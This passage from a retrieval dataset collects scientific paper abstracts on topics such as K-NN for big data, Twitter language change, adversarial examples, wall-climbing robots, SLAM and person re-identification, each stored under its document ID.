"text": "Corresponding Author: Vo Ngoc Phu Nguyen Tat Thanh University, 300A Nguyen Tat Thanh Street, Ward 13, District 4, Ho Chi Minh City, 702000, Vietnam Email: vongocphu03hca@gmail.com vongocphu@ntt.edu.vn Abstract: A Data Mining Has Already Had Many Algorithms Which A KNearest Neighbors Algorithm, K-NN, Is A Famous Algorithm For Researchers. K-NN Is Very Effective On Small Data Sets, However It Takes A Lot Of Time To Run On Big Datasets. Today, Data Sets Often Have Millions Of Data Records, Hence, It Is Difficult To Implement K-NN On Big Data. In This Research, We Propose An Improvement To K-NN To Process Big Datasets In A Shortened Execution Time. The Reformed KNearest Neighbors Algorithm (R-K-NN) Can Be Implemented On Large Datasets With Millions Or Even Billions Of Data Records. R-K-NN Is Tested On A Data Set With 500,000 Records. The Execution Time Of R-KNN Is Much Shorter Than That Of K-NN. In Addition, R-K-NN Is Implemented In A Parallel Network System With Hadoop Map (M) And Hadoop Reduce (R).",
"title": ""
},
{
"docid": "e61b6ae5d763fb135093cdfa035b82bf",
"text": "Computer-mediated communication is driving fundamental changes in the nature of written language. We investigate these changes by statistical analysis of a dataset comprising 107 million Twitter messages (authored by 2.7 million unique user accounts). Using a latent vector autoregressive model to aggregate across thousands of words, we identify high-level patterns in diffusion of linguistic change over the United States. Our model is robust to unpredictable changes in Twitter's sampling rate, and provides a probabilistic characterization of the relationship of macro-scale linguistic influence to a set of demographic and geographic predictors. The results of this analysis offer support for prior arguments that focus on geographical proximity and population size. However, demographic similarity - especially with regard to race - plays an even more central role, as cities with similar racial demographics are far more likely to share linguistic influence. Rather than moving towards a single unified \"netspeak\" dialect, language evolution in computer-mediated communication reproduces existing fault lines in spoken American English.",
"title": ""
},
{
"docid": "fca8b36d81d92138c3fdebffeaa04177",
"text": "Semantic Image Interpretation (SII) is the task of extracting structured semantic descriptions from images. It is widely agreed that the combined use of visual data and background knowledge is of great importance for SII. Recently, Statistical Relational Learning (SRL) approaches have been developed for reasoning under uncertainty and learning in the presence of data and rich knowledge. Logic Tensor Networks (LTNs) are an SRL framework which integrates neural networks with first-order fuzzy logic to allow (i) efficient learning from noisy data in the presence of logical constraints, and (ii) reasoning with logical formulas describing general properties of the data. In this paper, we develop and apply LTNs to two of the main tasks of SII, namely, the classification of an image’s bounding boxes and the detection of the relevant part-of relations between objects. To the best of our knowledge, this is the first successful application of SRL to such SII tasks. The proposed approach is evaluated on a standard image processing benchmark. Experiments show that the use of background knowledge in the form of logical constraints can improve the performance of purely data-driven approaches, including the state-of-the-art Fast Region-based Convolutional Neural Networks (Fast R-CNN). Moreover, we show that the use of logical background knowledge adds robustness to the learning system when errors are present in the labels of the",
"title": ""
},
{
"docid": "b0cc7d5313acaa47eb9cba9e830fa9af",
"text": "Data-driven intelligent transportation systems utilize data resources generated within intelligent systems to improve the performance of transportation systems and provide convenient and reliable services. Traffic data refer to datasets generated and collected on moving vehicles and objects. Data visualization is an efficient means to represent distributions and structures of datasets and reveal hidden patterns in the data. This paper introduces the basic concept and pipeline of traffic data visualization, provides an overview of related data processing techniques, and summarizes existing methods for depicting the temporal, spatial, numerical, and categorical properties of traffic data.",
"title": ""
},
{
"docid": "3f807cb7e753ebd70558a0ce74b416b7",
"text": "In this paper, we study the problem of recovering a tensor with missing data. We propose a new model combining the total variation regularization and low-rank matrix factorization. A block coordinate decent (BCD) algorithm is developed to efficiently solve the proposed optimization model. We theoretically show that under some mild conditions, the algorithm converges to the coordinatewise minimizers. Experimental results are reported to demonstrate the effectiveness of the proposed model and the efficiency of the numerical scheme. © 2015 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "f5fb99d9dccdd2a16dc4c3f160e65389",
"text": "We present the Flink system for the extraction, aggregation and visualization of online social networks. Flink employs semantic technology for reasoning with personal information extracted from a number of electronic information sources including web pages, emails, publication archives and FOAF profiles. The acquired knowledge is used for the purposes of social network analysis and for generating a webbased presentation of the community. We demonstrate our novel method to social science based on electronic data using the example of the Semantic Web research community.",
"title": ""
},
{
"docid": "1aceb187e79fae4d859d55ae1a2cc77e",
"text": "T HE recent development of various methods of modulation such as PCM and PPM which exchange bandwidth for signal-to-noise ratio has intensified the interest in a general theory of communication. A basis for such a theory is contained in the important papers of Nyquist 1 and Hartley2 on this subject. In the present paper we will extend the theory to include a number of new factors, in particular the effect of noise in the channel, and the savings possible due to the statistical structure of the original message and due to the nature of the final destination of the information. The fundamental problem of communication is that of reproducing at one point either exactly or approximately a message selected at another point. Frequently the messages have meaning; that is they refer to or are correlated according to some system with certain physical or conceptual entities. These semantic aspects of communication are irrelevant to the engineering problem. The significant aspect is that the actual message is one selected from a set of possible messages. The system must be designed to operate for each possible selection, not just the one which will actually be chosen since this is unknown at the time of design. If the number of messages in the set is finite then this number or any monotonic function of this number can be regarded as a measure of the information produced when one message is chosen from the set, all choices being equally likely. As was pointed out by Hartley the most natural choice is the logarithmic function. Although this definition must be generalized considerably when we consider the influence of the statistics of the message and when we have a continuous range of messages, we will in all cases use an essentially logarithmic measure. The logarithmic measure is more convenient for various reasons:",
"title": ""
},
{
"docid": "bbb0d0ae53039c5e94614fad60ab5cf7",
"text": "UNLABELLED\nSclerosing rhabdomyosarcoma (SRMS) is exceedingly rare, and may cause a great diagnostic confusion. Histologically, it is characterized by abundant extracellular hyalinized matrix mimicking primitive chondroid or osteoid tissue. So, it may be easily misdiagnosed as chondrosarcoma, osteosarcoma, angiosarcoma and so on. Herein, we report a case of SRMS occurring in the masseter muscle in a 40-year-old male. The tumor showed a diverse histological pattern. The tumor cells were arranged into nests, cords, pseudovascular, adenoid, microalveoli and even single-file arrays. Immunostaining showed that the tumor was positive for the Vimentin, Desmin and MyoD1, and was negative for CK, P63, NSE, CD45, CD30, S-100, CD99, Myoglobin, CD68, CD34, CD31, and α-SMA. Based on the morphological finding and immunostaining, it was diagnosed as a SRMS. In addition, focally, our case also displayed a cribriform pattern resembling adenoid cystic carcinoma. This may represent a new histological feature which can broaden the histological spectrum of this tumor and also may lead to diagnostic confusion.\n\n\nVIRTUAL SLIDES\nThe virtual slide(s) for this article can be found here: http://www.diagnosticpathology.diagnomx.eu/vs/1615846455818924.",
"title": ""
},
{
"docid": "a62cbb8f7b3a634ba1efe9dbe679fac6",
"text": "Cloud Computing offers virtualized computing, storage, and networking resources, over the Internet, to organizations and individual users in a completely dynamic way. These cloud resources are cheaper, easier to manage, and more elastic than sets of local, physical, ones. This encourages customers to outsource their applications and services to the cloud. The migration of both data and applications outside the administrative domain of customers into a shared environment imposes transversal, functional problems across distinct platforms and technologies. This article provides a contemporary discussion of the most relevant functional problems associated with the current evolution of Cloud Computing, mainly from the network perspective. The paper also gives a concise description of Cloud Computing concepts and technologies. It starts with a brief history about cloud computing, tracing its roots. Then, architectural models of cloud services are described, and the most relevant products for Cloud Computing are briefly discussed along with a comprehensive literature review. The paper highlights and analyzes the most pertinent and practical network issues of relevance to the provision of high-assurance cloud services through the Internet, including security. Finally, trends and future research directions are also presented.",
"title": ""
},
{
"docid": "74b0da517fab1f6e7e56f9e027549c08",
"text": "The ambition of this paper is to design a position controller of a DC motor by selection of a PID parameter using genetic algorithm. The Proportional plus Integral plus Derivative (PID), controllers are most widely used in control theory as well as industrial plants due to their ease of execution and robustness performance. The aspiration of this deed representation capable and apace tuning approach using Genetic Algorithm (GA) to obtain the optimized criterion of the PID controller so as to appropriate the essential appearance designation of the technique below consideration. This scheme is a simulation and experimental analysis into the development of PID controller using MATLAB/SIMULINK software. There are several techniques which are used for tuning of PID controller to control the speed control of DC motor. Tuning of PID parameters is considerable because these parameters have a admirable effect on the stability and performance of the control system. Using genetic algorithms to perform the tuning of the controller results in the optimum controller being appraise for the system every time.",
"title": ""
},
{
"docid": "681394e4cdb92de142f1bb9447d02110",
"text": "Generating adversarial examples is a critical step for evaluating and improving the robustness of learning machines. So far, most existing methods only work for classification and are not designed to alter the true performance measure of the problem at hand. We introduce a novel flexible approach named Houdini for generating adversarial examples specifically tailored for the final performance measure of the task considered, be it combinatorial and non-decomposable. We successfully apply Houdini to a range of applications such as speech recognition, pose estimation and semantic segmentation. In all cases, the attacks based on Houdini achieve higher success rate than those based on the traditional surrogates used to train the models while using a less perceptible adversarial perturbation.",
"title": ""
},
{
"docid": "8caf898272d692e36f76a6feb5ed36f3",
"text": "This paper reviews theory and research regarding the ‘‘Michelangelo phenomenon.’’ The Michelangelo model suggests that close partners sculpt one another’s selves, shaping one another’s skills and traits and promoting versus inhibiting one another’s goal pursuits. As a result of the manner in which partners perceive and behave toward one another, each person enjoys greater or lesser success at attaining his or her ideal-self goals. Affirmation of one another’s ideal-self goals yields diverse benefits, both personal and relational. The Michelangelo model and supportive empirical evidence are reviewed, the phenomenon is distinguished from related interpersonal processes, and directions for future work are outlined. KEYWORDS—Michelangelo phenomenon; interdependence; ideal self; relationships People have dreams and aspirations, or mental representations of the skills, traits, and resources that they ideally would like to acquire. These aspirations include diverse goals: People may want to acquire desirable traits such as warmth, confidence, or decisiveness; to achieve professional success in the form of advancement, peer respect, or financial benefits; or to advance important pursuits involving religion, travel, or athletics. Most explanations of how people acquire new skills, traits, and resources are intrapersonal, examining the individual in isolation (cf. Carver & Scheier, 1998). But granting that people sometimes achieve desirable goals through their own actions, this personcentric approach ignores the important role that close partners play in helping people achieve their dreams and aspirations. In the following pages we review theory and research regarding the ‘‘Michelangelo phenomenon,’’ one of the most prominent interpersonal models of how close partners promote versus inhibit each person’s pursuit of ideal self goals (Drigotas, Rusbult, Wieselquist, & Whitton, 1999). THE IDEAL SELF AND PARTNER AFFIRMATION Michelangelo Buonarroti described sculpting as a process whereby the artist releases an ideal figure from the block of stone in which it slumbers. The sculptor’s task is simply to chip away at the stone so as to reveal the ideal form (Gombrich, 1995). Figure 1 depicts one of Michelangelo’s unfinished captives, vividly illustrating this process. One can readily feel the force with which the ideal form strives to emerge from the stone, shedding its imperfections. The sculptor chisels, carves, and polishes the stone to reveal the ideal form slumbering within. Humans, too, possess ideal forms. The ideal self describes an individual’s dreams and aspirations, or the constellation of skills, traits, and resources that an individual ideally wishes to acquire (Higgins, 1987; Markus & Nurius, 1986). For example, Mary’s ideal self might include goals such as completing medical school, becoming more sociable, or learning to speak fluent Dutch. Whether images of the ideal self constitute vague yearnings or clearly articulated mental representations, dreams and aspirations serve a crucial function, providing direction to personal growth strivings and thereby helping people reduce the discrepancy between the actual self and the ideal self (Higgins, 1987). Although people sometimes achieve ideal-relevant goals solely through their own actions, the acquisition of new skills, traits, and resources is also shaped by interpersonal experience. 
People adapt to one another during the course of interaction, changing their behavior so as to coordinate with one another and respond to each person’s needs and expectations (Kelley et al., 2003). For example, John may help Mary become more sociable by subtly directing conversation during a dinner party, leading Mary to tell one of her most charming stories. Adaptation may transpire in interactions with diverse types of partner, including romantic partners, kin, friends, or colleagues. However, adaptation is most probable, powerful, and enduring in highly interdependent relationships, in that the mutual dependence of close partners provides good opportunities for exerting strong, frequent, and benevolent influence across diverse behavioral domains (Kelley et al., 1983). Over time, adaptations that begin as temporary, interaction-specific adjustments become stable components of the self, such that over the course of extended interaction, close partners sculpt one another’s selves: People come to reflect what their partners ‘‘see in them’’ and ‘‘elicit from them’’ (Rusbult & Van Lange, 2003). Address correspondence to Caryl E. Rusbult, Department of Social Psychology, Vrije Universiteit Amsterdam, Van der Boechorststraat 1, 1081 BT Amsterdam, The Netherlands; e-mail: ce.rusbult@ psy.vu.nl. CURRENT DIRECTIONS IN PSYCHOLOGICAL SCIENCE Volume 18—Number 6 305 Copyright r 2009 Association for Psychological Science Is such adaptation a good thing or a bad thing? The concept of partner affirmation describes whether the partner is an ally, neutral party, or foe in individual goal pursuits (Drigotas et al., 1999). As noted in Figure 2, affirmation has two components: Partner perceptual affirmation describes the extent to which a partner consciously or unconsciously perceives the target in ways that are compatible with the target’s ideal self. For example, John may deliberately consider the character of Mary’s ideal self, consciously developing benevolent interpretations of disparities between her actual self and ideal self. Alternatively, if John and Mary possess similar life goals or values, John may rather automatically perceive and display faith in Mary’s ideal goal pursuits. Partner behavioral affirmation describes the extent to which a partner consciously or unconsciously behaves in ways that elicit ideal-congruent behaviors from the target. For example, John may rather automatically communicate confidence in Mary’s abilities, he may consciously or unconsciously react in a positive manner when she enacts ideal congruent behaviors, or he may provide direct assistance in her goal pursuits. Of course, John may also disaffirm Mary by communicating indifference, pessimism, or disapproval, by undermining her ideal pursuits, or by affirming qualities that are antithetical to Mary’s ideal self. The model proposes that partner affirmation yields target movement toward the ideal self (see Fig. 2): Because John affirms Mary’s ideals, Mary increasingly comes to resemble her ideal self. Prior research has revealed good support for this claim. For example, in one study we videotaped married partners while they discussed a goal relevant to each person’s ideal self. Trained coders rated the extent to which the partner exhibited affirming behaviors (e.g., helped target clarify plans, offered assistance, or praised goal pursuits). Four months later, we asked targets whether they had achieved the goals they discussed in the conversations. 
Analyses revealed that when partners were more affirming during goal-relevant conversations, targets were more likely to achieve their ideal-self goals (Rusbult, Coolsen, et al., 2009). In another study we asked pairs of friends to provide complementary questionnaire data wherein (a) one friend served as ‘‘target,’’ rating his or her own experiences of partner affirmation and target movement (how affirming is your dating partner?; how successful are you at your goal pursuits?), and (b) the second friend served as ‘‘observer,’’ also rating partner affirmation and target movement (how affirming is the target’s dating partner?; how successful is the target at his or her goal pursuits?). Analyses revealed sizable across-friend associations—for example, when friends (as observers) described the target’s partner as highly affirming, individuals themselves (as targets) reported greater movement toward their ideal selves (Drigotas et al., 1999). Of what consequence is the Michelangelo phenomenon? Growth striving is a primary human motive (cf. Deci & Ryan, 2000)—a motive that is directly gratified by movement toward the ideal self. Accordingly, when a partner is affirming and a target moves closer to his or her ideals, the target enjoys enhanced personal well-being, including greater life satisfaction and psychological health (e.g., Drigotas, 2002). Moreover, when a partner serves as an ally in promoting target growth, the target enjoys enhanced couple well-being, including greater adjustment and probability of persistence (e.g., Drigotas et al., 1999; Kumashiro, Rusbult, Finkenauer, & Stocker, 2007). PARTNER AFFIRMATION AND RELATED INTERPERSONAL PROCESSES Partner Enhancement In what ways does partner affirmation differ from related interpersonal processes? To begin with, how does partner affirmation relate to partner enhancement, which describes the extent to which a partner perceives the target and behaves toward the target in ways that are more positive than may be ‘‘realistically’’ warranted—for example, in a manner that is more positive than the target perceives the self. Numerous studies have revealed that partner enhancement is beneficial to individuals and to relationships: For example, when partners perceive one another more positively than each person perceives himself or herself, relationships exhibit superior functioning (e.g., Murray, Holmes, & Griffin, 1996). Fig. 1. Unfinished ‘‘captive’’ by Michelangelo Buonarroti.",
"title": ""
},
{
"docid": "5a6b5e5a977f2a8732c260fb99a67cad",
"text": "The configuration design for a wall-climbing robot which is capable of moving on diversified surfaces of wall and has high payload capability, is discussed, and a developed quadruped wall-climbing robot, NINJA-1, is introduced. NINJA-1 is composed of (1) legs based on a 3D parallel link mechanism capable of producing a powerful driving force for moving on the surface of a wall, (2) a conduit-wire-driven parallelogram mechanism to adjust the posture of the ankles, and (3) a valve-regulated multiple sucker which can provide suction even if there are grooves and small differences in level of the wall. Finally, the data of the trial-manufactured NINJA-1, and the up-to-date status of the walking motion are shown.<<ETX>>",
"title": ""
},
{
"docid": "262c11ab9f78e5b3f43a31ad22cf23c5",
"text": "Responding to threats in the environment is crucial for survival. Certain types of threat produce defensive responses without necessitating previous experience and are considered innate, whereas other threats are learned by experiencing aversive consequences. Two important innate threats are whether an encountered stimulus is a member of the same species (social threat) and whether a stimulus suddenly appears proximal to the body (proximal threat). These threats are manifested early in human development and robustly elicit defensive responses. Learned threat, on the other hand, enables adaptation to threats in the environment throughout the life span. A well-studied form of learned threat is fear conditioning, during which a neutral stimulus acquires the ability to eliciting defensive responses through pairings with an aversive stimulus. If innate threats can facilitate fear conditioning, and whether different types of innate threats can enhance each other, is largely unknown. We developed an immersive virtual reality paradigm to test how innate social and proximal threats are related to each other and how they influence conditioned fear. Skin conductance responses were used to index the autonomic component of the defensive response. We found that social threat modulates proximal threat, but that neither proximal nor social threat modulates conditioned fear. Our results suggest that distinct processes regulate autonomic activity in response to proximal and social threat on the one hand, and conditioned fear on the other.",
"title": ""
},
{
"docid": "8b02f168b2021287848b413ffb297636",
"text": "BACKGROUND\nIdentification of patient at risk of subglottic infantile hemangioma (IH) is challenging because subglottic IH can grow fast and cause airway obstruction with a fatal course.\n\n\nOBJECTIVE\nTo refine the cutaneous IH pattern at risk of subglottic IH.\n\n\nMETHODS\nProspective and retrospective review of patients with cutaneous IH involving the beard area. IHs were classified in the bilateral pattern group (BH) or in the unilateral pattern group (UH). Infantile hemangioma topography, subtype (telangiectatic or tuberous), ear, nose and throat (ENT) manifestations and subglottic involvement were recorded.\n\n\nRESULTS\nThirty-one patients (21 BH and 10 UH) were included during a 20-year span. Nineteen patients (16 BH and 3 UH) had subglottic hemangioma. BH and UH group overlap on the median pattern (tongue, gum, lips, chin and neck). Median pattern, particularly the neck area and telangiectatic subtype of IH were significantly associated with subglottic involvement.\n\n\nCONCLUSION\nPatients presenting with telangiectatic beard IH localized on the median area need early ENT exploration. They should be treated before respiratory symptoms occur.",
"title": ""
},
{
"docid": "430c4f8912557f4286d152608ce5eab8",
"text": "The latex of the tropical species Carica papaya is well known for being a rich source of the four cysteine endopeptidases papain, chymopapain, glycyl endopeptidase and caricain. Altogether, these enzymes are present in the laticifers at a concentration higher than 1 mM. The proteinases are synthesized as inactive precursors that convert into mature enzymes within 2 min after wounding the plant when the latex is abruptly expelled. Papaya latex also contains other enzymes as minor constituents. Several of these enzymes namely a class-II and a class-III chitinase, an inhibitor of serine proteinases and a glutaminyl cyclotransferase have already been purified up to apparent homogeneity and characterized. The presence of a beta-1,3-glucanase and of a cystatin is also suspected but they have not yet been isolated. Purification of these papaya enzymes calls on the use of ion-exchange supports (such as SP-Sepharose Fast Flow) and hydrophobic supports [such as Fractogel TSK Butyl 650(M), Fractogel EMD Propyl 650(S) or Thiophilic gels]. The use of covalent or affinity gels is recommended to provide preparations of cysteine endopeptidases with a high free thiol content (ideally 1 mol of essential free thiol function per mol of enzyme). The selective grafting of activated methoxypoly(ethylene glycol) chains (with M(r) of 5000) on the free thiol functions of the proteinases provides an interesting alternative to the use of covalent and affinity chromatographies especially in the case of enzymes such as chymopapain that contains, in its native state, two thiol functions.",
"title": ""
},
{
"docid": "6a9ab5bca4f995e9649dc0d1f05a03b0",
"text": "With the prevalence of service computing and cloud computing, more and more services are emerging on the Internet, generating huge volume of data, such as trace logs, QoS information, service relationship, etc. The overwhelming service-generated data become too large and complex to be effectively processed by traditional approaches. How to store, manage, and create values from the service-oriented big data become an important research problem. On the other hand, with the increasingly large amount of data, a single infrastructure which provides common functionality for managing and analyzing different types of service-generated big data is urgently required. To address this challenge, this paper provides an overview of service-generated big data and Big Data-as-a-Service. First, three types of service-generated big data are exploited to enhance system performance. Then, Big Data-as-a-Service, including Big Data Infrastructure-as-a-Service, Big Data Platform-as-a-Service, and Big Data Analytics Software-as-a-Service, is employed to provide common big data related services (e.g., accessing service-generated big data and data analytics results) to users to enhance efficiency and reduce cost.",
"title": ""
},
{
"docid": "2ccae5b48fc5ac10f948b79fc4fb6ff3",
"text": "Hierarchical attention networks have recently achieved remarkable performance for document classification in a given language. However, when multilingual document collections are considered, training such models separately for each language entails linear parameter growth and lack of cross-language transfer. Learning a single multilingual model with fewer parameters is therefore a challenging but potentially beneficial objective. To this end, we propose multilingual hierarchical attention networks for learning document structures, with shared encoders and/or shared attention mechanisms across languages, using multi-task learning and an aligned semantic space as input. We evaluate the proposed models on multilingual document classification with disjoint label sets, on a large dataset which we provide, with 600k news documents in 8 languages, and 5k labels. The multilingual models outperform monolingual ones in low-resource as well as full-resource settings, and use fewer parameters, thus confirming their computational efficiency and the utility of cross-language transfer.",
"title": ""
},
{
"docid": "b8d1190ca313019386ed0ffd539a5a93",
"text": "A charge pump that generates positive and negative high voltages with low power-supply voltage and low power consumption was developed. By controlling the body and gate voltage of each transfer HVNMOS, high output voltage can be obtained from a low power-supply voltage. For low power consumption, the clock frequency of the charge pump is varied according to its output voltage. Output voltages of a seven-stage negative charge pump and a five-stage positive charge pump, fabricated with a 0.15- µ m CMOS process, were measured. These measurements show that the developed charge pump achieves the target regulation positive high voltage (+ 6.5 V) and negative high voltage (− 6 V) at low power-supply voltage Vdd of 1.5 V while also achieving low power consumption.",
"title": ""
}
] | scidocsrr |
712d1ac3d688e670b174400b7c91fdfe | You Are Known by How You Vlog: Personality Impressions and Nonverbal Behavior in YouTube | [
{
"docid": "4fd78d1f9737ad996a2e3b4495e911c6",
"text": "The accuracy of Wrst impressions was examined by investigating judged construct (negative aVect, positive aVect, the Big Wve personality variables, intelligence), exposure time (5, 20, 45, 60, and 300 s), and slice location (beginning, middle, end). Three hundred and thirty four judges rated 30 targets. Accuracy was deWned as the correlation between a judge’s ratings and the target’s criterion scores on the same construct. Negative aVect, extraversion, conscientiousness, and intelligence were judged moderately well after 5-s exposures; however, positive aVect, neuroticism, openness, and agreeableness required more exposure time to achieve similar levels of accuracy. Overall, accuracy increased with exposure time, judgments based on later segments of the 5-min interactions were more accurate, and 60 s yielded the optimal ratio between accuracy and slice length. Results suggest that accuracy of Wrst impressions depends on the type of judgment made, amount of exposure, and temporal location of the slice of judged social behavior. © 2007 Elsevier Inc. All rights reserved.",
"title": ""
}
] | [
{
"docid": "e9b2f987c4744e509b27cbc2ab1487be",
"text": "Analogy and similarity are often assumed to be distinct psychological processes. In contrast to this position, the authors suggest that both similarity and analogy involve a process of structural alignment and mapping, that is, that similarity is like analogy. In this article, the authors first describe the structure-mapping process as it has been worked out for analogy. Then, this view is extended to similarity, where it is used to generate new predictions. Finally, the authors explore broader implications of structural alignment for psychological processing.",
"title": ""
},
{
"docid": "3a6e736a2eda12e53f03de9782c75eda",
"text": "Alzheimer's disease (AD) is one of the most common neurodegenerative diseases that influences the central nervous system, often leading to dire consequences for quality of life. The disease goes through some stages mainly divided into early, moderate, and severe. Among them, the early stage is the most important as medical intervention has the potential to alter the natural progression of the condition. In practice, the early diagnosis is a challenge since the neurodegenerative changes can precede the onset of clinical symptoms by 10-15 years. This factor along with other known and unknown ones, hinder the ability for the early diagnosis and treatment of AD. Numerous research efforts have been proposed to address the complex characteristics of AD exploiting various tests including brain imaging that is massively utilized due to its powerful features. This paper aims to highlight our present knowledge on the clinical and computer-based attempts at early diagnosis of AD. We concluded that the door is still open for further research especially with the rapid advances in scanning and computer-based technologies.",
"title": ""
},
{
"docid": "ccc3c2ee7a08eb239443d5773707d782",
"text": "We introduce an iterative normalization and clustering method for single-cell gene expression data. The emerging technology of single-cell RNA-seq gives access to gene expression measurements for thousands of cells, allowing discovery and characterization of cell types. However, the data is confounded by technical variation emanating from experimental errors and cell type-specific biases. Current approaches perform a global normalization prior to analyzing biological signals, which does not resolve missing data or variation dependent on latent cell types. Our model is formulated as a hierarchical Bayesian mixture model with cell-specific scalings that aid the iterative normalization and clustering of cells, teasing apart technical variation from biological signals. We demonstrate that this approach is superior to global normalization followed by clustering. We show identifiability and weak convergence guarantees of our method and present a scalable Gibbs inference algorithm. This method improves cluster inference in both synthetic and real single-cell data compared with previous methods, and allows easy interpretation and recovery of the underlying structure and cell types.",
"title": ""
},
{
"docid": "e0d7d58ebeff18626666143c58fd7377",
"text": "A fundamental challenge in face recognition lies in determining which facial characteristics are important in the identification of faces. Several studies have indicated the significance of certain facial features in this regard, particularly internal ones such as the eyes and mouth. Surprisingly, however, one rather prominent facial feature has received little attention in this domain: the eyebrows. Past work has examined the role of eyebrows in emotional expression and nonverbal communication, as well as in facial aesthetics and sexual dimorphism. However, it has not been made clear whether the eyebrows play an important role in the identification of faces. Here, we report experimental results which suggest that for face recognition the eyebrows may be at least as influential as the eyes. Specifically, we find that the absence of eyebrows in familiar faces leads to a very large and significant disruption in recognition performance. In fact, a significantly greater decrement in face recognition is observed in the absence of eyebrows than in the absence of eyes. These results may have important implications for our understanding of the mechanisms of face recognition in humans as well as for the development of artificial face-recognition systems.",
"title": ""
},
{
"docid": "f333ebc879cf311bfc78297b78839ad9",
"text": "This paper explores the effectiveness of sparse representations obtained by learning a set of overcomplete basis (dictionary) in the context of action recognition in videos. Although this work concentrates on recognizing human movements-physical actions as well as facial expressions-the proposed approach is fairly general and can be used to address other classification problems. In order to model human actions, three overcomplete dictionary learning frameworks are investigated. An overcomplete dictionary is constructed using a set of spatio-temporal descriptors (extracted from the video sequences) in such a way that each descriptor is represented by some linear combination of a small number of dictionary elements. This leads to a more compact and richer representation of the video sequences compared to the existing methods that involve clustering and vector quantization. For each framework, a novel classification algorithm is proposed. Additionally, this work also presents the idea of a new local spatio-temporal feature that is distinctive, scale invariant, and fast to compute. The proposed approach repeatedly achieves state-of-the-art results on several public data sets containing various physical actions and facial expressions.",
"title": ""
},
{
"docid": "b44a9da1f384680742270f6c82ee9e31",
"text": "Person re-identification aims at finding a person of interest in an image gallery by comparing the probe image of this person with all the gallery images. It is generally treated as a retrieval problem, where the affinities between the probe image and gallery images (P2G affinities) are used to rank the retrieved gallery images. However, most existing methods only consider P2G affinities but ignore the affinities between all the gallery images (G2G affinity). Some frameworks incorporated G2G affinities into the testing process, which is not end-to-end trainable for deep neural networks. In this paper, we propose a novel group-shuffling random walk network for fully utilizing the affinity information between gallery images in both the training and testing processes. The proposed approach aims at end-to-end refining the P2G affinities based on G2G affinity information with a simple yet effective matrix operation, which can be integrated into deep neural networks. Feature grouping and group shuffle are also proposed to apply rich supervisions for learning better person features. The proposed approach outperforms state-of-the-art methods on the Market-1501, CUHK03, and DukeMTMC datasets by large margins, which demonstrate the effectiveness of our approach.",
"title": ""
},
{
"docid": "745be5c5d7ce6c0e07382f2287a1ab1c",
"text": "Ninhydrin is the most well known spray reagent for identification of amino acids. Spring with Ninhydrin as a non-specific reagent is well-known and widely used for its remarkable high sensitivity. Using Ninhydrin reagent alone to detect amino acid on thin layer chromatography (TLC) paper is not advisable due to its lower sensitivity. A new spray reagent, Stannus chloride solution (SnCl2) has been used to detect amino acids on filter paper (whitman paper 14) and TLC paper, silica Gel, 60 F254 TLC Aluminum Sheet 20 x 20 cm MerckGermany. Al so, modified TLC pre-staining method was used, which only consisted of 3 steps: spotting, separating and color. The improved method was rapid and inexpensive and the results obtained were clear and reliable. In addition it is suitable for screening different amino acid.",
"title": ""
},
{
"docid": "c8911f38bfd68baa54b49b9126c2ad22",
"text": "This document presents a performance comparison of three 2D SLAM techniques available in ROS: Gmapping, Hec-torSLAM and CRSM SLAM. These algorithms were evaluated using a Roomba 645 robotic platform with differential drive and a RGB-D Kinect sensor as an emulator of a scanner lasser. All tests were realized in static indoor environments. To improve the quality of the maps, some rosbag files were generated and used to build the maps in an off-line way.",
"title": ""
},
{
"docid": "27465b2c8ce92ccfbbda6c802c76838f",
"text": "Nonlinear hyperelastic energies play a key role in capturing the fleshy appearance of virtual characters. Real-world, volume-preserving biological tissues have Poisson’s ratios near 1/2, but numerical simulation within this regime is notoriously challenging. In order to robustly capture these visual characteristics, we present a novel version of Neo-Hookean elasticity. Our model maintains the fleshy appearance of the Neo-Hookean model, exhibits superior volume preservation, and is robust to extreme kinematic rotations and inversions. We obtain closed-form expressions for the eigenvalues and eigenvectors of all of the system’s components, which allows us to directly project the Hessian to semipositive definiteness, and also leads to insights into the numerical behavior of the material. These findings also inform the design of more sophisticated hyperelastic models, which we explore by applying our analysis to Fung and Arruda-Boyce elasticity. We provide extensive comparisons against existing material models.",
"title": ""
},
{
"docid": "496d0bfff9a88dd6c5c6641bad62c0cd",
"text": "Governments envisioning large-scale national egovernment policies increasingly draw on collaboration with private actors, yet the relationship between dynamics and outcomes of public-private partnership (PPP) is still unclear. The involvement of the banking sector in the emergence of a national electronic identification (e-ID) in Denmark is a case in point. Drawing on an analysis of primary and secondary data, we adopt the theoretical lens of collective action to investigate how transformations over time in the convergence of interests, the interdependence of resources, and the alignment of governance models between government and the banking sector shaped the emergence of the Danish national e-ID. We propose a process model to conceptualize paths towards the emergence of public-private collaboration for digital information infrastructure – a common good.",
"title": ""
},
{
"docid": "ffb87dc7922fd1a3d2a132c923eff57d",
"text": "It has been suggested that pulmonary artery pressure at the end of ejection is close to mean pulmonary artery pressure, thus contributing to the optimization of external power from the right ventricle. We tested the hypothesis that dicrotic notch and mean pulmonary artery pressures could be of similar magnitude in 15 men (50 +/- 12 yr) referred to our laboratory for diagnostic right and left heart catheterization. Beat-to-beat relationships between dicrotic notch and mean pulmonary artery pressures were studied 1) at rest over 10 consecutive beats and 2) in 5 patients during the Valsalva maneuver (178 beats studied). At rest, there was no difference between dicrotic notch and mean pulmonary artery pressures (21.8 +/- 12.0 vs. 21.9 +/- 11.1 mmHg). There was a strong linear relationship between dicrotic notch and mean pressures 1) over the 10 consecutive beats studied in each patient (mean r = 0.93), 2) over the 150 resting beats (r = 0.99), and 3) during the Valsalva maneuver in each patient (r = 0.98-0.99) and in the overall beats (r = 0.99). The difference between dicrotic notch and mean pressures was -0.1 +/- 1.7 mmHg at rest and -1.5 +/- 2.3 mmHg during the Valsalva maneuver. Substitution of the mean pulmonary artery pressure by the dicrotic notch pressure in the standard formula of the pulmonary vascular resistance (PVR) resulted in an equation relating linearly end-systolic pressure and stroke volume. The slope of this relation had the dimension of a volume elastance (in mmHg/ml), a simple estimate of volume elastance being obtained as 1.06(PVR/T), where T is duration of the cardiac cycle. In conclusion, dicrotic notch pressure was of similar magnitude as mean pulmonary artery pressure. These results confirmed our primary hypothesis and indicated that human pulmonary artery can be treated as if it is an elastic chamber with a volume elastance of 1.06(PVR/T).",
"title": ""
},
{
"docid": "512add70e73c26a76db5a99cd086e437",
